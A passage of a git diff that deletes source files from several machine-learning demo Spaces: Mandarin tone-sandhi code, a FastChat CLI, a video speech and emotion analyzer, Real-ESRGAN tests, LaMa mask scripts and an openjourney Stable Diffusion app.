所有/人 - if self._all_tone_three(sub) and len(sub) == 2: - finals_list[i][0] = finals_list[i][0][:-1] + "2" - # e.g. 好/喜欢 - elif i == 1 and not self._all_tone_three(sub) and finals_list[i][0][-1] == "3" and \ - finals_list[0][-1][-1] == "3": - - finals_list[0][-1] = finals_list[0][-1][:-1] + "2" - finals = sum(finals_list, []) - # split idiom into two words who's length is 2 - elif len(word) == 4: - finals_list = [finals[:2], finals[2:]] - finals = [] - for sub in finals_list: - if self._all_tone_three(sub): - sub[0] = sub[0][:-1] + "2" - finals += sub - - return finals - - def _all_tone_three(self, finals: List[str]) -> bool: - return all(x[-1] == "3" for x in finals) - - # merge "不" and the word behind it - # if don't merge, "不" sometimes appears alone according to jieba, which may occur sandhi error - def _merge_bu(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - last_word = "" - for word, pos in seg: - if last_word == "不": - word = last_word + word - if word != "不": - new_seg.append((word, pos)) - last_word = word[:] - if last_word == "不": - new_seg.append((last_word, 'd')) - last_word = "" - return new_seg - - # function 1: merge "一" and reduplication words in it's left and right, e.g. "听","一","听" ->"听一听" - # function 2: merge single "一" and the word behind it - # if don't merge, "一" sometimes appears alone according to jieba, which may occur sandhi error - # e.g. - # input seg: [('听', 'v'), ('一', 'm'), ('听', 'v')] - # output seg: [['听一听', 'v']] - def _merge_yi(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - # function 1 - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and word == "一" and i + 1 < len(seg) and seg[i - 1][ - 0] == seg[i + 1][0] and seg[i - 1][1] == "v": - new_seg[i - 1][0] = new_seg[i - 1][0] + "一" + new_seg[i - 1][0] - else: - if i - 2 >= 0 and seg[i - 1][0] == "一" and seg[i - 2][ - 0] == word and pos == "v": - continue - else: - new_seg.append([word, pos]) - seg = new_seg - new_seg = [] - # function 2 - for i, (word, pos) in enumerate(seg): - if new_seg and new_seg[-1][0] == "一": - new_seg[-1][0] = new_seg[-1][0] + word - else: - new_seg.append([word, pos]) - return new_seg - - # the first and the second words are all_tone_three - def _merge_continuous_three_tones( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - sub_finals_list = [ - lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for (word, pos) in seg - ] - assert len(sub_finals_list) == len(seg) - merge_last = [False] * len(seg) - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and self._all_tone_three( - sub_finals_list[i - 1]) and self._all_tone_three( - sub_finals_list[i]) and not merge_last[i - 1]: - # if the last word is reduplication, not merge, because reduplication need to be _neural_sandhi - if not self._is_reduplication(seg[i - 1][0]) and len( - seg[i - 1][0]) + len(seg[i][0]) <= 3: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - merge_last[i] = True - else: - new_seg.append([word, pos]) - else: - new_seg.append([word, pos]) - - return new_seg - - def _is_reduplication(self, word: str) -> bool: - return len(word) == 2 and word[0] == word[1] - - # the last char of first word and the first char of second word is tone_three - def _merge_continuous_three_tones_2( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - sub_finals_list = [ - lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for (word, pos) in seg - ] - assert len(sub_finals_list) == len(seg) - merge_last = [False] * len(seg) - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and sub_finals_list[i - 1][-1][-1] == "3" and sub_finals_list[i][0][-1] == "3" and not \ - merge_last[i - 1]: - # if the last word is reduplication, not merge, because reduplication need to be _neural_sandhi - if not self._is_reduplication(seg[i - 1][0]) and len( - seg[i - 1][0]) + len(seg[i][0]) <= 3: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - merge_last[i] = True - else: - new_seg.append([word, pos]) - else: - new_seg.append([word, pos]) - return new_seg - - def _merge_er(self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - for i, (word, pos) in enumerate(seg): - if i - 1 >= 0 and word == "儿" and seg[i-1][0] != "#": - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - else: - new_seg.append([word, pos]) - return new_seg - - def _merge_reduplication( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - new_seg = [] - for i, (word, pos) in enumerate(seg): - if new_seg and word == new_seg[-1][0]: - new_seg[-1][0] = new_seg[-1][0] + seg[i][0] - else: - new_seg.append([word, pos]) - return new_seg - - def pre_merge_for_modify( - self, seg: List[Tuple[str, str]]) -> List[Tuple[str, str]]: - seg = self._merge_bu(seg) - try: - seg = self._merge_yi(seg) - except: - print("_merge_yi failed") - seg = self._merge_reduplication(seg) - seg = self._merge_continuous_three_tones(seg) - seg = self._merge_continuous_three_tones_2(seg) - seg = self._merge_er(seg) - return seg - - def modified_tone(self, word: str, pos: str, - finals: List[str]) -> List[str]: - finals = self._bu_sandhi(word, finals) - finals = self._yi_sandhi(word, finals) - finals = self._neural_sandhi(word, pos, finals) - finals = self._three_sandhi(word, finals) - return finals diff --git a/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py b/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py deleted file mode 100644 index 75603d26cf2b8d6196f5a68a89f9e49d8e519bc8..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Jiaran-Bert-VITS2/monotonic_align/__init__.py +++ /dev/null @@ -1,15 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - -def maximum_path(neg_cent, mask): - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py b/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py deleted file mode 100644 index cb4a485fc2dd2ab2605f5650cc08984912a3f3ce..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/fastchat/serve/cli.py +++ /dev/null @@ -1,172 +0,0 @@ -""" -Chat with a model with command line interface. - -Usage: -python3 -m fastchat.serve.cli --model ~/model_weights/llama-7b -""" -import argparse -import os -import re - -from prompt_toolkit import PromptSession -from prompt_toolkit.auto_suggest import AutoSuggestFromHistory -from prompt_toolkit.completion import WordCompleter -from prompt_toolkit.history import InMemoryHistory -from rich.console import Console -from rich.markdown import Markdown -from rich.live import Live - -from fastchat.serve.inference import chat_loop, ChatIO - - -class SimpleChatIO(ChatIO): - def prompt_for_input(self, role) -> str: - return input(f"{role}: ") - - def prompt_for_output(self, role: str): - print(f"{role}: ", end="", flush=True) - - def stream_output(self, output_stream, skip_echo_len: int): - pre = 0 - for outputs in output_stream: - outputs = outputs[skip_echo_len:].strip() - outputs = outputs.split(" ") - now = len(outputs) - 1 - if now > pre: - print(" ".join(outputs[pre:now]), end=" ", flush=True) - pre = now - print(" ".join(outputs[pre:]), flush=True) - return " ".join(outputs) - - -class RichChatIO(ChatIO): - def __init__(self): - self._prompt_session = PromptSession(history=InMemoryHistory()) - self._completer = WordCompleter( - words=["!exit", "!reset"], pattern=re.compile("$") - ) - self._console = Console() - - def prompt_for_input(self, role) -> str: - self._console.print(f"[bold]{role}:") - # TODO(suquark): multiline input has some issues. fix it later. - prompt_input = self._prompt_session.prompt( - completer=self._completer, - multiline=False, - auto_suggest=AutoSuggestFromHistory(), - key_bindings=None, - ) - self._console.print() - return prompt_input - - def prompt_for_output(self, role: str): - self._console.print(f"[bold]{role}:") - - def stream_output(self, output_stream, skip_echo_len: int): - """Stream output from a role.""" - # TODO(suquark): the console flickers when there is a code block - # above it. We need to cut off "live" when a code block is done. - - # Create a Live context for updating the console output - with Live(console=self._console, refresh_per_second=4) as live: - # Read lines from the stream - for outputs in output_stream: - accumulated_text = outputs[skip_echo_len:] - if not accumulated_text: - continue - # Render the accumulated text as Markdown - # NOTE: this is a workaround for the rendering "unstandard markdown" - # in rich. The chatbots output treat "\n" as a new line for - # better compatibility with real-world text. However, rendering - # in markdown would break the format. It is because standard markdown - # treat a single "\n" in normal text as a space. - # Our workaround is adding two spaces at the end of each line. - # This is not a perfect solution, as it would - # introduce trailing spaces (only) in code block, but it works well - # especially for console output, because in general the console does not - # care about trailing spaces. - lines = [] - for line in accumulated_text.splitlines(): - lines.append(line) - if line.startswith("```"): - # Code block marker - do not add trailing spaces, as it would - # break the syntax highlighting - lines.append("\n") - else: - lines.append(" \n") - markdown = Markdown("".join(lines)) - # Update the Live console output - live.update(markdown) - self._console.print() - return outputs[skip_echo_len:] - - -def main(args): - if args.gpus: - if args.num_gpus and len(args.gpus.split(",")) < int(args.num_gpus): - raise ValueError(f"Larger --num-gpus ({args.num_gpus}) than --gpus {args.gpus}!") - os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus - if args.style == "simple": - chatio = SimpleChatIO() - elif args.style == "rich": - chatio = RichChatIO() - else: - raise ValueError(f"Invalid style for console: {args.style}") - try: - chat_loop( - args.model_path, - args.device, - args.num_gpus, - args.max_gpu_memory, - args.load_8bit, - args.conv_template, - args.temperature, - args.max_new_tokens, - chatio, - args.debug, - ) - except KeyboardInterrupt: - print("exit...") - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument( - "--model-path", - type=str, - default="facebook/opt-350m", - help="The path to the weights", - ) - parser.add_argument( - "--device", type=str, choices=["cpu", "cuda", "mps"], default="cuda" - ) - parser.add_argument( - "--gpus", - type=str, - default=None, - help="A single GPU like 1 or multiple GPUs like 0,2" - ) - parser.add_argument("--num-gpus", type=str, default="1") - parser.add_argument( - "--max-gpu-memory", - type=str, - help="The maximum memory per gpu. Use a string like '13Gib'", - ) - parser.add_argument( - "--load-8bit", action="store_true", help="Use 8-bit quantization." - ) - parser.add_argument( - "--conv-template", type=str, default=None, help="Conversation prompt template." - ) - parser.add_argument("--temperature", type=float, default=0.7) - parser.add_argument("--max-new-tokens", type=int, default=512) - parser.add_argument( - "--style", - type=str, - default="simple", - choices=["simple", "rich"], - help="Display style.", - ) - parser.add_argument("--debug", action="store_true") - args = parser.parse_args() - main(args) diff --git a/spaces/abrar-adnan/speech-analyzer/app.py b/spaces/abrar-adnan/speech-analyzer/app.py deleted file mode 100644 index 0c1934cdcbb7a2f066c69df3918b390b6ec33eb2..0000000000000000000000000000000000000000 --- a/spaces/abrar-adnan/speech-analyzer/app.py +++ /dev/null @@ -1,193 +0,0 @@ -import gradio as gr -import os -import cv2 -import face_recognition -from fastai.vision.all import load_learner -import time -import base64 -from deepface import DeepFace -import torchaudio -import moviepy.editor as mp -from transformers import WhisperProcessor, WhisperForConditionalGeneration, pipeline - -# import pathlib -# temp = pathlib.PosixPath -# pathlib.PosixPath = pathlib.WindowsPath - -backends = [ - 'opencv', - 'ssd', - 'dlib', - 'mtcnn', - 'retinaface', - 'mediapipe' -] - -emotion_pipeline = pipeline("text-classification", model="j-hartmann/emotion-english-distilroberta-base", return_all_scores=True) -sentiment_pipeline = pipeline("sentiment-analysis", model="distilbert-base-uncased-finetuned-sst-2-english") - -model = load_learner("gaze-recognizer-v4.pkl") - -def analyze_emotion(text): - result = emotion_pipeline(text) - return result - -def analyze_sentiment(text): - result = sentiment_pipeline(text) - return result - -def getTranscription(path): - # Insert Local Video File Path - clip = mp.VideoFileClip(path) - - # Insert Local Audio File Path - clip.audio.write_audiofile(r"audio.wav") - - waveform, sample_rate = torchaudio.load("audio.wav") - resampler = torchaudio.transforms.Resample(sample_rate, 16000) - waveform = resampler(waveform)[0] - - processor = WhisperProcessor.from_pretrained("openai/whisper-tiny") - model = WhisperForConditionalGeneration.from_pretrained("openai/whisper-tiny") - model.config.forced_decoder_ids = None - - input_features = processor(waveform.squeeze(dim=0), return_tensors="pt").input_features - predicted_ids = model.generate(input_features) - - transcription = processor.batch_decode(predicted_ids, skip_special_tokens=True) - - return transcription[0] - -def video_processing(video_file, encoded_video): - emotion_count = 0 - video_emotions = { - 'angry': 0, - 'disgust': 0, - 'fear': 0, - 'happy': 0, - 'sad': 0, - 'surprise': 0, - 'neutral':0 - } - - if encoded_video != "": - - decoded_file_data = base64.b64decode(encoded_video) - - with open("temp_video.mp4", "wb") as f: - f.write(decoded_file_data) - - video_file = "temp_video.mp4" - - start_time = time.time() - - transcription = getTranscription(video_file) - print(transcription) - text_emotion = analyze_emotion(transcription) - print(text_emotion) - text_sentiment = analyze_sentiment(transcription) - print(text_sentiment) - - video_capture = cv2.VideoCapture(video_file) - on_camera = 0 - off_camera = 0 - total = 0 - - while True: - # Read a single frame from the video - for i in range(24*3): - ret, frame = video_capture.read() - if not ret: - break - - # If there are no more frames, break out of the loop - if not ret: - break - - # Convert the frame to RGB color (face_recognition uses RGB) - gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) - - # Find all the faces in the frame using a pre-trained convolutional neural network. - face_locations = face_recognition.face_locations(gray) - - if len(face_locations) > 0: - # Show the original frame with face rectangles drawn around the faces - for top, right, bottom, left in face_locations: - # cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2) - face_image = gray[top:bottom, left:right] - color_image = frame[top:bottom, left:right] - - # Resize the face image to the desired size - resized_face_image = cv2.resize(face_image, (128,128)) - - try: - detected_face_emotion = DeepFace.analyze(color_image,actions=['emotion'],detector_backend = backends[2],enforce_detection = False)# 2,3, 4 works - for emotion in detected_face_emotion: - for key in video_emotions.keys(): - video_emotions[key] += emotion['emotion'][key] - emotion_count += 1 - except Exception as e: - emotion = 0 - pass - - # Predict the class of the resized face image using the model - result = model.predict(resized_face_image) - print(result[0]) - if result[0] == 'on_camera': - on_camera += 1 - elif result[0] == 'off_camera': - off_camera += 1 - total += 1 - - try: - # your processing code here - gaze_percentage = on_camera / total * 100 - except Exception as e: - print(f"An error occurred while processing the video: {e}") - gaze_percentage = 'ERROR : no face detected' - print(f'Total = {total},on_camera = {on_camera},off_camera = {off_camera}') - # Release the video capture object and close all windows - video_capture.release() - cv2.destroyAllWindows() - end_time = time.time() - print(f'Time taken: {end_time-start_time}') - if os.path.exists("temp_video.mp4"): - os.remove("temp_video.mp4") - if os.path.exists("audio.wav"): - os.remove("audio.wav") - print(gaze_percentage) - - # Divide all emotion values by emotion count - if emotion_count > 0: - for key in video_emotions.keys(): - video_emotions[key] /= emotion_count - - - # Modify 'angry' key to 'anger' - video_emotions['anger'] = video_emotions.pop('angry') - - # Modify 'happy' key to 'joy' - video_emotions['joy'] = video_emotions.pop('happy') - - # Modify 'sad' key to 'sadness' - video_emotions['sadness'] = video_emotions.pop('sad') - - - - final_result_dict = { - "gaze_percentage" : gaze_percentage, - "face_emotion" : video_emotions, - "text_emotion" : text_emotion[0], - "transcription" : transcription, - "text_sentiment" : text_sentiment - } - - return final_result_dict - - -demo = gr.Interface(fn=video_processing, - inputs=["video", "text"], - outputs="json") - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/akdeniz27/pix2struct-DocVQA/README.md b/spaces/akdeniz27/pix2struct-DocVQA/README.md deleted file mode 100644 index 4319641794d87e1962d54e21c66b79e55240b78b..0000000000000000000000000000000000000000 --- a/spaces/akdeniz27/pix2struct-DocVQA/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Pix2struct DocVQA -emoji: 🏢 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/akhaliq/Real-ESRGAN/tests/test_model.py b/spaces/akhaliq/Real-ESRGAN/tests/test_model.py deleted file mode 100644 index c20bb1d56ed20222e929e9c94026f6ea383c6026..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/Real-ESRGAN/tests/test_model.py +++ /dev/null @@ -1,126 +0,0 @@ -import torch -import yaml -from basicsr.archs.rrdbnet_arch import RRDBNet -from basicsr.data.paired_image_dataset import PairedImageDataset -from basicsr.losses.losses import GANLoss, L1Loss, PerceptualLoss - -from realesrgan.archs.discriminator_arch import UNetDiscriminatorSN -from realesrgan.models.realesrgan_model import RealESRGANModel -from realesrgan.models.realesrnet_model import RealESRNetModel - - -def test_realesrnet_model(): - with open('tests/data/test_realesrnet_model.yml', mode='r') as f: - opt = yaml.load(f, Loader=yaml.FullLoader) - - # build model - model = RealESRNetModel(opt) - # test attributes - assert model.__class__.__name__ == 'RealESRNetModel' - assert isinstance(model.net_g, RRDBNet) - assert isinstance(model.cri_pix, L1Loss) - assert isinstance(model.optimizers[0], torch.optim.Adam) - - # prepare data - gt = torch.rand((1, 3, 32, 32), dtype=torch.float32) - kernel1 = torch.rand((1, 5, 5), dtype=torch.float32) - kernel2 = torch.rand((1, 5, 5), dtype=torch.float32) - sinc_kernel = torch.rand((1, 5, 5), dtype=torch.float32) - data = dict(gt=gt, kernel1=kernel1, kernel2=kernel2, sinc_kernel=sinc_kernel) - model.feed_data(data) - # check dequeue - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # change probability to test if-else - model.opt['gaussian_noise_prob'] = 0 - model.opt['gray_noise_prob'] = 0 - model.opt['second_blur_prob'] = 0 - model.opt['gaussian_noise_prob2'] = 0 - model.opt['gray_noise_prob2'] = 0 - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # ----------------- test nondist_validation -------------------- # - # construct dataloader - dataset_opt = dict( - name='Demo', - dataroot_gt='tests/data/gt', - dataroot_lq='tests/data/lq', - io_backend=dict(type='disk'), - scale=4, - phase='val') - dataset = PairedImageDataset(dataset_opt) - dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=0) - assert model.is_train is True - model.nondist_validation(dataloader, 1, None, False) - assert model.is_train is True - - -def test_realesrgan_model(): - with open('tests/data/test_realesrgan_model.yml', mode='r') as f: - opt = yaml.load(f, Loader=yaml.FullLoader) - - # build model - model = RealESRGANModel(opt) - # test attributes - assert model.__class__.__name__ == 'RealESRGANModel' - assert isinstance(model.net_g, RRDBNet) # generator - assert isinstance(model.net_d, UNetDiscriminatorSN) # discriminator - assert isinstance(model.cri_pix, L1Loss) - assert isinstance(model.cri_perceptual, PerceptualLoss) - assert isinstance(model.cri_gan, GANLoss) - assert isinstance(model.optimizers[0], torch.optim.Adam) - assert isinstance(model.optimizers[1], torch.optim.Adam) - - # prepare data - gt = torch.rand((1, 3, 32, 32), dtype=torch.float32) - kernel1 = torch.rand((1, 5, 5), dtype=torch.float32) - kernel2 = torch.rand((1, 5, 5), dtype=torch.float32) - sinc_kernel = torch.rand((1, 5, 5), dtype=torch.float32) - data = dict(gt=gt, kernel1=kernel1, kernel2=kernel2, sinc_kernel=sinc_kernel) - model.feed_data(data) - # check dequeue - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # change probability to test if-else - model.opt['gaussian_noise_prob'] = 0 - model.opt['gray_noise_prob'] = 0 - model.opt['second_blur_prob'] = 0 - model.opt['gaussian_noise_prob2'] = 0 - model.opt['gray_noise_prob2'] = 0 - model.feed_data(data) - # check data shape - assert model.lq.shape == (1, 3, 8, 8) - assert model.gt.shape == (1, 3, 32, 32) - - # ----------------- test nondist_validation -------------------- # - # construct dataloader - dataset_opt = dict( - name='Demo', - dataroot_gt='tests/data/gt', - dataroot_lq='tests/data/lq', - io_backend=dict(type='disk'), - scale=4, - phase='val') - dataset = PairedImageDataset(dataset_opt) - dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=0) - assert model.is_train is True - model.nondist_validation(dataloader, 1, None, False) - assert model.is_train is True - - # ----------------- test optimize_parameters -------------------- # - model.feed_data(data) - model.optimize_parameters(1) - assert model.output.shape == (1, 3, 32, 32) - assert isinstance(model.log_dict, dict) - # check returned keys - expected_keys = ['l_g_pix', 'l_g_percep', 'l_g_gan', 'l_d_real', 'out_d_real', 'l_d_fake', 'out_d_fake'] - assert set(expected_keys).issubset(set(model.log_dict.keys())) diff --git a/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py b/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py deleted file mode 100644 index 738f76875c82aa412063bb5bff15e69c46f20362..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/lama/bin/gen_debug_mask_dataset.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 - -import glob -import os - -import PIL.Image as Image -import cv2 -import numpy as np -import tqdm -import shutil - - -from saicinpainting.evaluation.utils import load_yaml - - -def generate_masks_for_img(infile, outmask_pattern, mask_size=200, step=0.5): - inimg = Image.open(infile) - width, height = inimg.size - step_abs = int(mask_size * step) - - mask = np.zeros((height, width), dtype='uint8') - mask_i = 0 - - for start_vertical in range(0, height - step_abs, step_abs): - for start_horizontal in range(0, width - step_abs, step_abs): - mask[start_vertical:start_vertical + mask_size, start_horizontal:start_horizontal + mask_size] = 255 - - cv2.imwrite(outmask_pattern.format(mask_i), mask) - - mask[start_vertical:start_vertical + mask_size, start_horizontal:start_horizontal + mask_size] = 0 - mask_i += 1 - - -def main(args): - if not args.indir.endswith('/'): - args.indir += '/' - if not args.outdir.endswith('/'): - args.outdir += '/' - - config = load_yaml(args.config) - - in_files = list(glob.glob(os.path.join(args.indir, '**', f'*{config.img_ext}'), recursive=True)) - for infile in tqdm.tqdm(in_files): - outimg = args.outdir + infile[len(args.indir):] - outmask_pattern = outimg[:-len(config.img_ext)] + '_mask{:04d}.png' - - os.makedirs(os.path.dirname(outimg), exist_ok=True) - shutil.copy2(infile, outimg) - - generate_masks_for_img(infile, outmask_pattern, **config.gen_kwargs) - - -if __name__ == '__main__': - import argparse - - aparser = argparse.ArgumentParser() - aparser.add_argument('config', type=str, help='Path to config for dataset generation') - aparser.add_argument('indir', type=str, help='Path to folder with images') - aparser.add_argument('outdir', type=str, help='Path to folder to store aligned images and masks to') - - main(aparser.parse_args()) diff --git a/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh b/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh deleted file mode 100644 index d9b2a370ceeeb8f401706f4303298db13e5fad91..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env bash - -# !!! file set to make test_large_30k from the vanilla test_large: configs/test_large_30k.lst - -# paths to data are valid for mml7 -PLACES_ROOT="/data/inpainting/Places365" -OUT_DIR="/data/inpainting/paper_data/Places365_val_test" - -source "$(dirname $0)/env.sh" - -for datadir in test_large_30k # val_large -do - for conf in random_thin_256 random_medium_256 random_thick_256 random_thin_512 random_medium_512 random_thick_512 - do - "$BINDIR/gen_mask_dataset.py" "$CONFIGDIR/data_gen/${conf}.yaml" \ - "$PLACES_ROOT/$datadir" "$OUT_DIR/$datadir/$conf" --n-jobs 8 - - "$BINDIR/calc_dataset_stats.py" --samples-n 20 "$OUT_DIR/$datadir/$conf" "$OUT_DIR/$datadir/${conf}_stats" - done - - for conf in segm_256 segm_512 - do - "$BINDIR/gen_mask_dataset.py" "$CONFIGDIR/data_gen/${conf}.yaml" \ - "$PLACES_ROOT/$datadir" "$OUT_DIR/$datadir/$conf" --n-jobs 2 - - "$BINDIR/calc_dataset_stats.py" --samples-n 20 "$OUT_DIR/$datadir/$conf" "$OUT_DIR/$datadir/${conf}_stats" - done -done diff --git a/spaces/akhaliq/openjourney/app.py b/spaces/akhaliq/openjourney/app.py deleted file mode 100644 index 33db95967a9e7d26bae17e6d175bc370aa9680d8..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/openjourney/app.py +++ /dev/null @@ -1,276 +0,0 @@ -from diffusers import AutoencoderKL, UNet2DConditionModel, StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image -import utils -import datetime -import time -import psutil - -start_time = time.time() -is_colab = utils.is_google_colab() - -class Model: - def __init__(self, name, path="", prefix=""): - self.name = name - self.path = path - self.prefix = prefix - self.pipe_t2i = None - self.pipe_i2i = None - -models = [ - Model("openjourney", "prompthero/openjourney", "openjourney style"), - ] - # Model("Spider-Verse", "nitrosocke/spider-verse-diffusion", "spiderverse style "), - # Model("Balloon Art", "Fictiverse/Stable_Diffusion_BalloonArt_Model", "BalloonArt "), - # Model("Elden Ring", "nitrosocke/elden-ring-diffusion", "elden ring style "), - # Model("Tron Legacy", "dallinmackay/Tron-Legacy-diffusion", "trnlgcy ") - #Model("Pokémon", "lambdalabs/sd-pokemon-diffusers", ""), - #Model("Pony Diffusion", "AstraliteHeart/pony-diffusion", ""), - #Model("Robo Diffusion", "nousr/robo-diffusion", ""), - -scheduler = DPMSolverMultistepScheduler( - beta_start=0.00085, - beta_end=0.012, - beta_schedule="scaled_linear", - num_train_timesteps=1000, - trained_betas=None, - predict_epsilon=True, - thresholding=False, - algorithm_type="dpmsolver++", - solver_type="midpoint", - lower_order_final=True, -) - -custom_model = None -if is_colab: - models.insert(0, Model("Custom model")) - custom_model = models[0] - -last_mode = "txt2img" -current_model = models[1] if is_colab else models[0] -current_model_path = current_model.path - -if is_colab: - pipe = StableDiffusionPipeline.from_pretrained(current_model.path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - -else: # download all models - print(f"{datetime.datetime.now()} Downloading vae...") - vae = AutoencoderKL.from_pretrained(current_model.path, subfolder="vae", torch_dtype=torch.float16) - for model in models: - try: - print(f"{datetime.datetime.now()} Downloading {model.name} model...") - unet = UNet2DConditionModel.from_pretrained(model.path, subfolder="unet", torch_dtype=torch.float16) - model.pipe_t2i = StableDiffusionPipeline.from_pretrained(model.path, unet=unet, vae=vae, torch_dtype=torch.float16, scheduler=scheduler) - model.pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained(model.path, unet=unet, vae=vae, torch_dtype=torch.float16, scheduler=scheduler) - except Exception as e: - print(f"{datetime.datetime.now()} Failed to load model " + model.name + ": " + str(e)) - models.remove(model) - pipe = models[0].pipe_t2i - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - -device = "GPU 🔥" if torch.cuda.is_available() else "CPU 🥶" - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - -def custom_model_changed(path): - models[0].path = path - global current_model - current_model = models[0] - -def on_model_change(model_name): - - prefix = "Enter prompt. \"" + next((m.prefix for m in models if m.name == model_name), None) + "\" is prefixed automatically" if model_name != models[0].name else "Don't forget to use the custom model prefix in the prompt!" - - return gr.update(visible = model_name == models[0].name), gr.update(placeholder=prefix) - -def inference(model_name, prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt=""): - - print(psutil.virtual_memory()) # print memory usage - - global current_model - for model in models: - if model.name == model_name: - current_model = model - model_path = current_model.path - - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - - try: - if img is not None: - return img_to_img(model_path, prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(model_path, prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - -def txt_to_img(model_path, prompt, neg_prompt, guidance, steps, width, height, generator): - - print(f"{datetime.datetime.now()} txt_to_img, model: {current_model.name}") - - global last_mode - global pipe - global current_model_path - if model_path != current_model_path or last_mode != "txt2img": - current_model_path = model_path - - if is_colab or current_model == custom_model: - pipe = StableDiffusionPipeline.from_pretrained(current_model_path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - else: - pipe = pipe.to("cpu") - pipe = current_model.pipe_t2i - - if torch.cuda.is_available(): - pipe = pipe.to("cuda") - last_mode = "txt2img" - - prompt = current_model.prefix + prompt - result = pipe( - prompt, - negative_prompt = neg_prompt, - # num_images_per_prompt=n_images, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return replace_nsfw_images(result) - -def img_to_img(model_path, prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - print(f"{datetime.datetime.now()} img_to_img, model: {model_path}") - - global last_mode - global pipe - global current_model_path - if model_path != current_model_path or last_mode != "img2img": - current_model_path = model_path - - if is_colab or current_model == custom_model: - pipe = StableDiffusionImg2ImgPipeline.from_pretrained(current_model_path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - else: - pipe = pipe.to("cpu") - pipe = current_model.pipe_i2i - - if torch.cuda.is_available(): - pipe = pipe.to("cuda") - last_mode = "img2img" - - prompt = current_model.prefix + prompt - ratio = min(height / img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe( - prompt, - negative_prompt = neg_prompt, - # num_images_per_prompt=n_images, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return replace_nsfw_images(result) - -def replace_nsfw_images(results): - - if is_colab: - return results.images[0] - - for i in range(len(results.images)): - if results.nsfw_content_detected[i]: - results.images[i] = Image.open("nsfw.png") - return results.images[0] - -css = """.finetuned-diffusion-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.finetuned-diffusion-div div h1{font-weight:900;margin-bottom:7px}.finetuned-diffusion-div 